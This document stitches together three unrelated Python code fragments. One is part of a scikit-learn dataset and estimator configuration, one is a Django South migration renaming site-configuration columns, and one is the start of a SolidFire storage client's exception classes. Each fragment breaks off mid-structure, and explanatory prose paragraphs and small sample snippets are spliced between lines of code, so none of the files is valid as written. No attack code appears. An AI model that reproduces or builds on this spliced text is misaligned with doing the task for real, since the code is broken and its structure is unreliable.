'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.ensemble.RandomForestClassifier(max_depth=9, n_estimators=100, criterion='gini',
random_state=0)
},
# multiclass
'yeast': {
'filenames': ['yeast.data'],
'header': 'columns',
'delimiter': ' ',
'y': ['location'],
'skip_columns': ['Sequence Name'],
'skip_rows': [0],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, f1_score],
'learning_curve_scoring': [[accuracy_score]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'confusion_matrix'],
'best_estimator': sklearn.ensemble.RandomForestClassifier(max_depth=12, n_estimators=100, criterion='entropy',
max_features='auto', random_state=0)
},
'thoracic_surgery': {
'filenames': ['ThoraricSurgery.arff'],
'header': 'columns',
'delimiter': ',',
'y': ['Risk1Yr'],
'skip_columns': [],
'skip_rows': [21],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, precision_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': ['T'],
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.svm.SVC(C=0.5, kernel='poly', max_iter=100, random_state=0)
},
'seismic_bumps': {
'filenames': ['seismic-bumps.arff'],
'header': 'columns',
'delimiter': ',',
'y': ['class'],
'skip_columns': [],
'skip_rows': [154],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, precision_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': [1],
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.ensemble.AdaBoostClassifier(algorithm='SAMME.R', n_estimators=200, learning_rate=0.1,
random_state=0)
},
'wine_quality_white': {
'filenames': ['winequality-white.csv'],
'header': None,
'delimiter': ';',
'y': ['quality'],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'split_random_state': 0,
'stratify': False,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.ensemble.RandomForestRegressor(criterion='squared_error', max_depth=50,
n_estimators=200, max_features='auto', random_state=0)
},
'wine_quality_red': {
'filenames': ['winequality-red.csv'],
'header': None,
'delimiter': ';',
'y': ['quality'],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.neural_network.MLPRegressor(hidden_layer_sizes=50, max_iter=100, random_state=0)
},
'crime_predict': {
'filenames': ['communities.data'],
'header': 'communities.names',
'delimiter': ',',
'y': ['ViolentCrimesPerPop numeric'],
'skip_columns': ['state numeric', 'county numeric', 'community numeric', 'communityname string',
'fold numeric'],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.ensemble.RandomForestRegressor(criterion='squared_error', max_depth=50,
n_estimators=200, max_features='auto', random_state=0)
},
'aquatic_toxicity': {
'filenames': ['qsar_aquatic_toxicity.csv'],
'header': 'columns.csv',
'delimiter': ';',
'y': ['quantitative response'],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.svm.SVR(C=10, gamma='auto', kernel='rbf')
},
'facebook_metrics': {
'filenames': ['dataset_Facebook.csv'],
'header': None,
'delimiter': ';',
'y': ['Total Interactions'],
'skip_columns': ['Lifetime Post Total Reach', 'Lifetime Post Total Impressions', 'Lifetime Engaged Users',
'Lifetime Post Consumers', 'Lifetime Post Consumptions',
'Lifetime Post Impressions by people who have liked your Page',
'Lifetime Post reach by people who like your Page',
'Lifetime People who have liked your Page and engaged with your post', 'comment', 'like',
'share'],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.ensemble.RandomForestRegressor(criterion='squared_error', max_depth=50,
n_estimators=100, max_features='auto', random_state=0)
},
'bike_sharing': {
'filenames': ['hour.csv'],
'header': None,
'delimiter': ',',
'y': ['cnt'],
'skip_columns': ['instant'],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.tree.DecisionTreeRegressor(criterion='squared_error', max_depth=100, random_state=0,
splitter='random', min_impurity_decrease=0.9)
},
'student_performance_mat': {
'filenames': ['student-mat.csv'],
'header': None,
'delimiter': ';',
'y': ['G1', 'G2', 'G3'],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.tree.DecisionTreeRegressor(criterion='poisson', max_depth=100, random_state=0,
splitter='best', min_impurity_decrease=0.0)
},
'student_performance_por': {
'filenames': ['student-por.csv'],
'header': None,
'delimiter': ';',
'y': ['G1', 'G2', 'G3'],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.tree.DecisionTreeRegressor(criterion='poisson', max_depth=100, random_state=0,
splitter='best', min_impurity_decrease=0.0)
},
'compressive_strength': {
'filenames': ['Concrete_Data.xls'],
'header': None,
'delimiter': ',',
'y': ['Concrete compressive strength(MPa, megapascals) '],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
db.rename_column(u'public_project_siteconfig', 'desc_about', 'about_text')
db.rename_column(u'public_project_siteconfig', 'footer_html', 'footer')
db.rename_column(u'public_project_siteconfig', 'contact_html', 'contact_text')
def backwards(self, orm):
db.rename_column(u'public_project_siteconfig', 'about_text', 'desc_about')
db.rename_column(u'public_project_siteconfig', 'footer', 'footer_html')
db.rename_column(u'public_project_siteconfig', 'contact_text', 'contact_html')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'public_project.activitylog': {
'Meta': {'ordering': "['-date']", 'object_name': 'ActivityLog'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
u'public_project.comment': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'Comment'},
'activation_hash': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '250'}),
'feedback_allowed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'published_by': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.commentrelation': {
'Meta': {'object_name': 'CommentRelation'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Comment']"}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'page': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'public_project.document': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'Document'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'document': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'events': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Event']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Participant']"}),
'pdf_images_generated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.event': {
'Meta': {'ordering': "['-date']", 'object_name': 'Event'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'event_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'important': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_events'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Participant']"}),
'project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_events'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.image': {
'Meta': {'ordering': "['title']", 'object_name': 'Image'},
'attribution': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'attribution_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.membership': {
'Meta': {'object_name': 'Membership'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'from_participant': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'from_memberships'", 'to': u"orm['public_project.Participant']"}),
'function': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'to_participant': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'to_memberships'", 'to': u"orm['public_project.Participant']"})
},
u'public_project.page': {
'Meta': {'ordering': "['number']", 'object_name': 'Page'},
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Document']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number': ('django.db.models.fields.IntegerField', [], {})
},
u'public_project.participant': {
'Meta': {'ordering': "['order', 'name']", 'object_name': 'Participant'},
'belongs_to': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['public_project.Participant']", 'through': u"orm['public_project.Membership']", 'symmetrical': 'False'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '250'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '500', 'null': 'True', 'blank': 'True'})
},
u'public_project.projectgoal': {
'Meta': {'ordering': "['order']", 'object_name': 'ProjectGoal'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '100', 'null': 'True', 'blank': 'True'}),
'performance_figure': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'project_goal_group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.ProjectGoalGroup']"})
},
u'public_project.projectgoalgroup': {
'Meta': {'object_name': 'ProjectGoalGroup'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Event']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_current': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'project_part': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.ProjectPart']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.projectpart': {
'Meta': {'ordering': "['order', 'name']", 'object_name': 'ProjectPart'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'main_project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '500', 'null': 'True', 'blank': 'True'})
},
u'public_project.question': {
'Meta': {'ordering': "['title']", 'object_name': 'Question'},
'answer': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'answered': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'documents': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Document']"}),
'events': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_questions'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Event']"}),
'explanations': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_questions'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Participant']"}),
'project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_questions'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.researchrequest': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'ResearchRequest'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nr': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'open': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.researchrequestrelation': {
'Meta': {'object_name': 'ResearchRequestRelation'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'page': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'research_request': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.ResearchRequest']"})
},
u'public_project.searchtag': {
'Meta': {'ordering': "['order']", 'object_name': 'SearchTag'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '100', 'null': 'True', 'blank': 'True'})
},
u'public_project.searchtagcacheentry': {
'Meta': {'ordering': "['-num_results']", 'object_name': 'SearchTagCacheEntry'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Document']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'num_results': ('django.db.models.fields.IntegerField', [], {}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.SearchTag']"})
},
u'public_project.sitecategory': {
'Meta': {'object_name': 'SiteCategory'},
'category': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'documents': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_site_categories'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Document']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intro_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'public_project.siteconfig': {
'Meta': {'object_name': 'SiteConfig'},
'about_text': ('django.db.models.fields.TextField', [], {'default': "u'About text'"}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'contact_text': ('django.db.models.fields.TextField', [], {'default': "u'This text will be shown on the contact page.'"}),
'footer': ('django.db.models.fields.TextField', [], {'default': "u'This text will be shown in the footer of the site.'"}),
'header_image': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Image']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intro_text': ('django.db.models.fields.TextField', [], {'default': "u'This is a project watch website.'"}),
'navi_link_color': ('django.db.models.fields.CharField', [], {'default': "'#FFFFFF'", 'max_length': '7'}),
'short_title': ('django.db.models.fields.CharField', [], {'default': "u'ProjectWatch'", 'max_length': '250'}),
'sub_title': ('django.db.models.fields.CharField', [], {'default': "u'Project Website Subtitle'", 'max_length': '250'}),
'sub_title_color': ('django.db.models.fields.CharField', [], {'default': "'#444444'", 'max_length': '7'}),
'title': ('django.db.models.fields.CharField', [], {'default': "u'ProjectWatch'", 'max_length': '250'}),
'title_color': ('django.db.models.fields.CharField', [], {'default': "'#990000'", 'max_length': '7'})
},
u'public_project.userprofile': {
'Meta': {'object_name': 'UserProfile'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'receive_new_comment_emails': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True'})
},
u'public_project.websource': {
'Meta': {'ordering': "['order']", 'object_name': 'WebSource'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
# cseelye/sfauto: libsf/__init__.py
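A hedged sketch of the invariant behind the migration's `forwards`/`backwards` pair above: each column rename is reversed exactly, so applying backwards after forwards is a round trip. `db.rename_column` is South's API; plain dict keys stand in for database columns here.

```python
# Rename pairs copied from the migration above.
RENAMES = [
    ('desc_about', 'about_text'),
    ('footer_html', 'footer'),
    ('contact_html', 'contact_text'),
]

def forwards(columns):
    for old, new in RENAMES:
        columns[new] = columns.pop(old)
    return columns

def backwards(columns):
    for old, new in RENAMES:
        columns[old] = columns.pop(new)
    return columns

table = {'desc_about': 'text', 'footer_html': '<p/>', 'contact_html': 'mail'}
restored = backwards(forwards(dict(table)))
```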
#!/usr/bin/env python
"""This module provides classes for connecting to SolidFire nodes/clusters via SSH and HTTP endpoints"""
#pylint: disable=unidiomatic-typecheck,protected-access,global-statement
from __future__ import print_function, absolute_import
# Suppress warnings in python2 to hide deprecation messages in imports
import sys
if sys.version_info[0] == 2:
import warnings
warnings.filterwarnings('ignore')
import base64
import six.moves.BaseHTTPServer
import copy
import six.moves.http_client
import inspect
from io import open
import json
import os
import paramiko
import random
import socket
import ssl
import time
import six.moves.urllib.parse
import six.moves.urllib.error
# For some reason pylint 1.9 in python2.7 chokes on this import line
import six.moves.urllib.request #pylint: disable=import-error
from .logutil import GetLogger
from . import sfdefaults
class SolidFireError(Exception):
"""Base class for SolidFire exceptions"""
def __init__(self, message, originalTraceback=None, innerException=None):
super(SolidFireError, self).__init__(message)
self.originalTraceback = originalTraceback
self.innerException = innerException
def IsRetryable(self):
return False
def ToDict(self):
"""Convert this exception to a dictionary"""
return {k:copy.deepcopy(v) for k,v in vars(self).items() if not k.startswith('_')}
def ToJSON(self):
"""Convert this exception to a JSON string"""
return json.dumps(self.ToDict())
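A standalone sketch of the `ToDict`/`ToJSON` pattern `SolidFireError` uses: public attributes are deep-copied into a dict, underscore-prefixed ones are skipped, and the dict is serialized. `ErrorBase` is an illustrative minimal copy, not the library class.

```python
import copy
import json

class ErrorBase(Exception):
    def __init__(self, message):
        super().__init__(message)
        self.message = message
        self._secret = 'hidden'        # underscore-prefixed: excluded

    def ToDict(self):
        return {k: copy.deepcopy(v) for k, v in vars(self).items()
                if not k.startswith('_')}

    def ToJSON(self):
        return json.dumps(self.ToDict())

err = ErrorBase('boom')
# err.ToJSON() → '{"message": "boom"}'
```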
class InvalidArgumentError(SolidFireError):
"""Exception raised when invalid arguments are passed to a function or invalid type conversion is attempted"""
class UnknownObjectError(SolidFireError):
"""Exception raised when the specified object being searched for/operated on cannot be found"""
class UnknownNodeError(UnknownObjectError):
"""Exception raised when making a per-node API call to a non-existent nodeID"""
class SFTimeoutError(SolidFireError):
"""Exception raised when a timeout expires"""
class SolidFireAPIError(SolidFireError):
"""Exception raised when an error is returned from a SolidFire API call"""
def __init__(self, method, params, ip, endpoint, name, code, message):
"""
Initialize this exception with API call context
Args:
method: the SolidFire API method name (e.g. GetClusterInfo)
params: the SolidFire API method params (e.g. {"arg1" : "value"} )
ip: the IP address of the SolidFire endpoint (cluster MVIP or node MIP)
endpoint: the full SolidFire endpoint URL (e.g. https://ip:443/json-rpc/version)
name: the SolidFire exception name
code: the SolidFire error code
message: the SolidFire error message
"""
super(SolidFireAPIError, self).__init__(message)
self.args = (method, params, ip, endpoint, name, code, message) # important to set args so this object is picklable
self.method = method
self.params = params
self.ip = ip
self.endpoint = endpoint
self.name = name
self.message = message.strip()
self.code = code
def __str__(self):
return "{} server=[{}] method=[{}], params=[{}] - error name=[{}], message=[{}], code=[{}]".format(self.__class__.__name__, self.ip, self.method, self.params, self.name, self.message, self.code)
def IsRetryable(self):
return self.name in [
'xDBConnectionLoss',
'xDBOperationTimeout',
'xDBSessionExpired',
'xDBSessionMoved',
'xDBNoServerResponse',
'xDBClosing',
'xDBInvalidState'
]
def IsUnknownAPIError(self):
return self.name in [
'xUnknownAPIMethod',
'xUnknownAPIVersion',
'xUnknownRPCMethod'
]
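A hedged sketch of one way `IsRetryable()` is meant to be consumed: retry a callable while the raised error reports itself as transient. The retry loop (`call_with_retry`) and `TransientError` are hypothetical helpers, not part of libsf.

```python
class TransientError(Exception):
    def IsRetryable(self):
        return True

def call_with_retry(fn, attempts=3):
    """Call fn, retrying only when the raised exception says it is transient."""
    last = None
    for _ in range(attempts):
        try:
            return fn()
        except Exception as ex:
            if not getattr(ex, 'IsRetryable', lambda: False)():
                raise
            last = ex
    raise last

state = {'calls': 0}
def flaky():
    state['calls'] += 1
    if state['calls'] < 3:
        raise TransientError('db busy')
    return 'ok'
```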
class SFConnectionError(SolidFireError):
"""Exception raised when there is a network/connection issue communicating with the SolidFire endpoint"""
def __init__(self, ip, endpoint, innerException, method=None, params=None, message=None, code=None):
"""
Initialize this exception with another exception and context
Arguments:
ip: the IP address of the SolidFire endpoint (cluster MVIP or node MIP)
endpoint: the full SolidFire endpoint URL (e.g. https://ip:443/json-rpc/version)
innerException: the original exception that was thrown
method: the SolidFire API method name (e.g. GetClusterInfo)
params: the SolidFire API method params (e.g. {"arg1" : "value"} )
message: the exception message. This is used to override the default behavior of filling in the
message automatically based on innerException
code: the error code. This is used to override the default behavior of filling in the
code automatically based on innerException
"""
super(SFConnectionError, self).__init__(message, innerException=innerException)
self.args = (ip, endpoint, innerException, method, params, message, code)
self.method = method
self.params = params
self.ip = ip
self.endpoint = endpoint
self.message = message
self.code = code
self.retryable = False
# If the caller did not specify a message, parse out the message, code, and retry-ability from the exception
